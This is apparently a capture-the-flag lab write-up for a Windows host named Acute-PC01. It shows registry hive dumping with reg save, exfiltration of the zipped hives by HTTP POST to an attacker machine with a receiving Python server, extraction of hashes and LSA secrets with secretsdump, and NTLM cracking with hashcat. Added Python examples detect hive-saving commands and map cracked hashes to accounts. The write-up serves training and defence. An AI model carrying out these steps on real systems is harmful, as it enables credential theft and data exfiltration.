System Compromise
Lateral movement was made to the Acute-PC01 host as the jmorgan user earlier.
PS C:\Users\jmorgan\Documents> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ==============================================
acute\jmorgan S-1-5-21-1786406921-1914792807-2072761762-1108


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ===============================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators                     Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
Checking the user's privileges confirms that the jmorgan user is a local administrator: the token is a member of BUILTIN\Administrators and runs at High integrity.
PS C:\Users\jmorgan\Documents> cmd /c reg save hklm\sam SAM
cmd /c reg save hklm\sam SAM
The operation completed successfully.
PS C:\Users\jmorgan\Documents> cmd /c reg save hklm\system SYSTEM
cmd /c reg save hklm\system SYSTEM
The operation completed successfully.
PS C:\Users\jmorgan\Documents> cmd /c reg save hklm\security SECURITY
cmd /c reg save hklm\security SECURITY
The operation completed successfully.
With the SAM, SYSTEM and SECURITY hives saved, the Acute-PC01 host is completely compromised.
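As an added defender-side example (not part of the original write-up), the following Python flags the hive-saving commands above in process-creation telemetry and escalates when one user on one host has saved both SAM and SYSTEM. The event records are constructed, and the field names (host, user, cmdline) are assumed rather than taken from any particular SIEM schema.

```python
import re
from collections import defaultdict

# Matches the command lines used above: reg / reg.exe save of the SAM, SYSTEM or
# SECURITY hive under HKLM, quoted or unquoted, in any case.
HIVE_RE = re.compile(
    r'\breg(?:\.exe)?\s+save\s+"?(?:hklm|hkey_local_machine)\\(sam|system|security)\b',
    re.IGNORECASE,
)

# Constructed process-creation events (Sysmon Event ID 1 / Security 4688 style);
# not real telemetry from the lab host. Field names are assumed.
SAMPLE_EVENTS = [
    {"host": "Acute-PC01", "user": r"acute\jmorgan",
     "cmdline": r"cmd /c reg save hklm\sam SAM"},
    {"host": "Acute-PC01", "user": r"acute\jmorgan",
     "cmdline": r"cmd /c reg save hklm\system SYSTEM"},
    {"host": "Acute-PC01", "user": r"acute\jmorgan",
     "cmdline": r'reg.exe  save "HKLM\SECURITY" C:\Users\jmorgan\Documents\SECURITY'},
    {"host": "Acute-PC01", "user": r"acute\jmorgan",
     "cmdline": r"reg query hklm\software\microsoft\windows\currentversion\run"},
    {"host": "Acute-PC01", "user": r"acute\jmorgan",
     "cmdline": r"cmd /c reg save hklm\sam SAM"},
]


def detect_hive_dumps(events):
    """Return one (host, user, HIVE) tuple per event whose command line saves a credential hive."""
    findings = []
    for ev in events:
        match = HIVE_RE.search(ev["cmdline"])
        if match:
            findings.append((ev["host"], ev["user"], match.group(1).upper()))
    return findings


def offline_dump_candidates(findings):
    """(host, user) pairs that saved both SAM and SYSTEM: that pair alone lets secretsdump
    recover local NT hashes offline, so it deserves a higher-severity alert than a lone hive."""
    seen = defaultdict(set)
    for host, user, hive in findings:
        seen[(host, user)].add(hive)
    return sorted(key for key, hives in seen.items() if {"SAM", "SYSTEM"} <= hives)


if __name__ == "__main__":
    hits = detect_hive_dumps(SAMPLE_EVENTS)
    for host, user, hive in hits:
        print(f"[hive save] {host} {user}: {hive}")
    print("offline credential dump candidates:", offline_dump_candidates(hits))
```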
Hashdump
PS C:\Users\jmorgan\Documents> Compress-Archive -Path .\* -DestinationPath .\secret.zip
Archiving the saved hives into the secret.zip file
PS C:\Users\jmorgan\Documents> iwr -Uri 'http://10.10.16.8:2222' -Method POST -InFile 'C:\Users\jmorgan\Documents\secret.zip'
Sending the archive to the Kali host at 10.10.16.8 over an HTTP POST request
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ACUTE-PC01]
└─$ cat post.py
from http.server import BaseHTTPRequestHandler, HTTPServer


class MyRequestHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        # Read exactly the body length the client declared and save it as secret.zip
        content_length = int(self.headers['Content-Length'])
        data = self.rfile.read(content_length)
        with open('secret.zip', 'wb') as f:
            f.write(data)
        self.send_response(200)
        self.end_headers()  # flush the status line so the client does not wait for a reply


httpd = HTTPServer(('0.0.0.0', 2222), MyRequestHandler)
httpd.serve_forever()
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ACUTE-PC01]
└─$ python3 post.py
10.10.11.145 - - [07/Nov/2023 21:22:18] "POST / HTTP/1.1" 200 -
A local Python web server receives and saves the file
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ACUTE-PC01]
└─$ unzip secret.zip
Archive: secret.zip
inflating: SAM
inflating: SECURITY
inflating: SYSTEM
Extracting the secrets
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ACUTE-PC01]
└─$ impacket-secretsdump local -sam SAM -system SYSTEM -security SECURITY -outputfile acute-pc01
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x44397c32a634e3d8d8f64bff8c614af7
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740:::
Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:f100a3ee4033082ed1a4d0df185f745021bba4dcf380666882e38cdac20c1fbd1eadc129d0f18c3fdbd4458ac66b7f9c24b78b0017ccc37a219b6bf192bc0f973d853b2cc3deb97daa0f456068f2dae317e4bb6dec0883a0721cdc4286c169e39dfa88afb057ffc4cac8cf641a5a037f35a8611e04bd8cfa9f6a604bff70ade3b1a027e210c4537cf92a90a94ab40631f51ffffaa920c4d3fe39d3a8807a57189f9d77c86ce5e96d2cd222654e14f85d4323d2401c7284a952a32299107bc88b16c049bd952e2cd1e471cb9d1c176c48473da971522346ea243c79b36e4627840d18c5f6f62e89e1b898ec7a7c79a98f
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:816f14efc1aef18b93f811509ea9a98e
[*] DPAPI_SYSTEM
dpapi_machinekey:0x574d0cc939c9f986cba32d1546a7fa28747425e0
dpapi_userkey:0x4a77ea6673a027ecd81e4ca010b1d3f70fe1d9cd
[*] NL$KM
0000 62 2A 29 8D F9 77 CC DD EE EB 23 20 B2 E2 AF 59 b*)..w....# ...Y
0010 0B F6 33 E0 95 5D B0 03 B1 01 85 55 9D 16 64 4D ..3..].....U..dM
0020 53 1F 93 7B FB EF 2B F7 6E 76 B1 02 3D 63 CC DF S..{..+.nv..=c..
0030 F0 35 6F E3 19 8A 69 C1 2E F6 78 80 45 51 EE 0A .5o...i...x.EQ..
NL$KM:622a298df977ccddeeeb2320b2e2af590bf633e0955db003b10185559d16644d531f937bfbef2bf76e76b1023d63ccdff0356fe3198a69c12ef678804551ee0a
[*] Cleaning up...
Using impacket-secretsdump, I can dump the local account hashes of the Acute-PC01 host. While this doesn't include domain credentials, I try to crack these hashes.
Password Cracking
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ACUTE-PC01]
└─$ hashcat -a 0 -m 1000 acute-pc01.sam /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
Hashes: 5 digests; 4 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
31d6cfe0d16ae931b73c59d7e0c089c0:
a29f7623fd11550def0192de9246f46b:Password@123
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: acute-pc01.sam
Time.Started.....: Tue Nov 7 21:28:06 2023 (3 secs)
Time.Estimated...: Tue Nov 7 21:28:09 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 4962.2 kH/s (0.09ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 2/4 (50.00%) Digests (total), 2/4 (50.00%) Digests (new)
Progress.........: 14344386/14344386 (100.00%)
Rejected.........: 0/14344386 (0.00%)
Restore.Point....: 14344386/14344386 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[2121736578796269746368] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 26%
Started: Tue Nov 7 21:27:53 2023
Stopped: Tue Nov 7 21:28:10 2023
hashcat was able to crack a single NTLM hash; the other digest it reports as recovered, 31d6cfe0d16ae931b73c59d7e0c089c0, is just the NT hash of an empty password. The cracked password is Password@123
┌──(kali㉿kali)-[~/…/htb/labs/acute/3S_ACUTE-PC01]
└─$ grep -i a29f7623fd11550def0192de9246f46b acute-pc01.sam
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
Although the cracked password belongs only to the local Administrator account of Acute-PC01, I should test it against the ATSSERVER host for password reuse.
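The grep above maps the cracked hash back to its account by hand. As an added example (not from the original write-up), this Python does the same correlation over secretsdump's .sam output and hashcat's hash:plain lines, and separates a real crack from the empty-password hash that hashcat also counts as recovered; the sample input is the page's own output, embedded here as constructed strings.

```python
# NT hash of the empty string (MD4 over UTF-16LE ""): accounts with no password set.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# secretsdump's acute-pc01.sam lines (user:rid:lmhash:nthash:::) and hashcat's
# hash:plain output, both copied from above and embedded here as sample input.
SAM_LINES = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740:::
Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
"""
CRACKED_LINES = """\
31d6cfe0d16ae931b73c59d7e0c089c0:
a29f7623fd11550def0192de9246f46b:Password@123
"""

def parse_sam(text):
    """Return [(user, rid, nthash)] from secretsdump's pwdump-style SAM lines."""
    accounts = []
    for line in text.splitlines():
        if line.count(":") >= 3:
            user, rid, _lm, nt = line.split(":")[:4]
            accounts.append((user, int(rid), nt.lower()))
    return accounts

def parse_cracked(text):
    """Return {nthash: plaintext} from hashcat 'hash:plain' lines (stdout or potfile)."""
    cracked = {}
    for line in text.splitlines():
        if ":" in line:
            nt, plain = line.split(":", 1)  # split once: plaintexts may contain ':'
            if plain.startswith("$HEX[") and plain.endswith("]"):  # hashcat hex form
                plain = bytes.fromhex(plain[5:-1]).decode("utf-8", errors="replace")
            cracked[nt.lower()] = plain
    return cracked

def correlate(sam_text, cracked_text):
    """Map each account to ('cracked', plain), ('empty', '') or ('uncracked', None)."""
    cracked = parse_cracked(cracked_text)
    report = {}
    for user, _rid, nt in parse_sam(sam_text):
        if nt == EMPTY_NT:  # hashcat counts this as recovered, hence 2/4 digests above
            report[user] = ("empty", "")
        elif nt in cracked:
            report[user] = ("cracked", cracked[nt])
        else:
            report[user] = ("uncracked", None)
    return report
```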